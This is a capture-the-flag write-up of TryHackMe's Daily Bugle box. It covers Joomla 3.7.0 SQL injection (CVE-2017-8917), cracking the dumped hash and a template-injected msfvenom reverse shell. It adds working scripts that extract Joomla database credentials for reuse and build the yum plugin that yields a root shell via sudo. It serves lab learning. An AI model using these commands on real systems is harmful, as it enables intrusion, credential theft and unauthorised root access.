Daily Bugle — TryHackMe

Demanou Henri
3 min read · Mar 9, 2022

Port and Service Enumeration

Using nmap, we discover SSH on port 22, the Joomla CMS on port 80 and a MySQL server on port 3306:

Browsing the endpoints found by nmap, I discover the administrator login page used to manage the website:

admin login

I tested basic SQL injection on this form and a brute-force attack, with no success. As Joomla is a CMS, I used Metasploit to determine the version:

metasploit: auxiliary/scanner/http/joomla_version

Gaining a Foothold

Using searchsploit, I discovered an SQL injection in the com_fields component (CVE-2017-8917) affecting the detected Joomla version, 3.7.0:

I tried the Metasploit module joomla_comfields_sqli_rce against this vulnerability, but it was not working. So I googled around and found a Python script on GitHub (joomblah) that dumps a username and password hash from the database:

Using John the Ripper, I cracked this bcrypt hash and recovered the password:

I tried logging into the MySQL server and over SSH with these credentials, but neither worked. They did work on the administration page mentioned above:

Just like WordPress, Joomla can be exploited through the plugins and templates installed on the site. In this instance I replaced the PHP code of a template's index.php with a reverse shell generated by msfvenom:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.17.226 LPORT=4444 -f raw > shell.php

I used Metasploit's multi/handler to set up a listener and got a connection back (a netcat listener would also work, provided the payload is a plain PHP reverse shell such as php/reverse_php rather than meterpreter):

Privilege Escalation

A quick look at the files in the current directory reveals a configuration.php containing the username and password Joomla uses to connect to the MySQL server. I also checked which users exist on the system and found jjameson:

As is so often the case, people reuse the same password a lot, so I tried these database credentials over SSH as jjameson, and it worked!
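Pulling the database settings out of Joomla's configuration.php is usually the first thing to do after landing a web shell, since the file holds them as plain PHP class properties. The snippet below is an added example, not code from the original writeup: the sample configuration.php is constructed here with placeholder values (not the box's real credentials), and the parser assumes the standard JConfig layout of one `public $name = 'value';` property per line.

```shell
#!/bin/sh
# Added example (not part of the original writeup): extract the database
# settings from a Joomla configuration.php so they can be tried against
# MySQL and, as the writeup does, against SSH for password reuse.

# Return the value of one JConfig property ($2) from the file $1.
# Matches both "public $x = '...';" (Joomla 3) and "var $x = '...';" (older).
joomla_prop() {
    sed -nE "s/^[[:space:]]*(public|var)[[:space:]]+\\\$$2[[:space:]]*=[[:space:]]*'([^']*)';.*/\2/p" "$1"
}

# Print the settings relevant to a database login, one key=value per line.
joomla_db_creds() {
    for k in host user password db dbprefix; do
        printf '%s=%s\n' "$k" "$(joomla_prop "$1" "$k")"
    done
}

# Constructed sample configuration.php; values are placeholders only.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
<?php
class JConfig {
	public $offline = '0';
	public $host = 'localhost';
	public $user = 'joomla_db';
	public $password = 'ExamplePassw0rd';
	public $db = 'joomla';
	public $dbprefix = 'fb9j5_';
	public $secret = 'NotTheRealSecret';
}
EOF

joomla_db_creds "$SAMPLE"
```

With a real file the output feeds straight into `mysql -h HOST -u USER -p DB`, or into an SSH login attempt for every local user found in /etc/passwd, which is the reuse the writeup exploits.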

Checking which programs the current user can run as root (sudo -l) reveals a single entry:

/usr/bin/yum

Following the GTFOBins entry for yum, we get an interactive root shell by pointing yum at a custom plugin directory and loading a plugin that spawns /bin/sh, then read the root flag and complete the challenge:
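The plugin trick works because yum imports its plugins as Python modules and calls their init_hook() before doing anything else, and sudo runs that import as root. The script below is an added example, not the author's own commands: it writes the three files GTFOBins describes (a yum config that points plugin lookups at a throwaway directory, a plugin config that enables the plugin, and the plugin itself) and prints the sudo command that loads them instead of running it, so the files can be inspected first. It assumes sudo rights to /usr/bin/yum as found on the box and a yum with Python plugin support.

```shell
#!/bin/sh
# Added example (not from the original writeup): build the throwaway yum
# plugin used for the sudo yum privilege escalation described on GTFOBins.

build_yum_plugin() {
    TF=$(mktemp -d)

    # yum configuration: enable plugins and look for them (and their
    # per-plugin config) only in our directory, expanded at write time.
    cat > "$TF/x" <<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

    # per-plugin configuration: plugin "y" is enabled
    cat > "$TF/y.conf" <<EOF
[main]
enabled=1
EOF

    # the plugin: yum imports it as root and calls init_hook(), which
    # replaces the yum process with an interactive /bin/sh
    cat > "$TF/y.py" <<'EOF'
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version = '2.1'
def init_hook(conduit):
    os.execl('/bin/sh', '/bin/sh')
EOF

    printf '%s\n' "$TF"
}

# The command that triggers the plugin load; printed, not executed, so the
# generated files can be reviewed before handing them to sudo.
yum_privesc_cmd() {
    printf 'sudo yum -c %s/x --enableplugin=y\n' "$1"
}

PLUGIN_DIR=$(build_yum_plugin)
yum_privesc_cmd "$PLUGIN_DIR"
```

Running the printed command drops you into a root shell; because yum runs as root, the plugin directory only has to be readable by root, so a fresh mktemp directory under /tmp is enough.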

Thank you for reading this far!
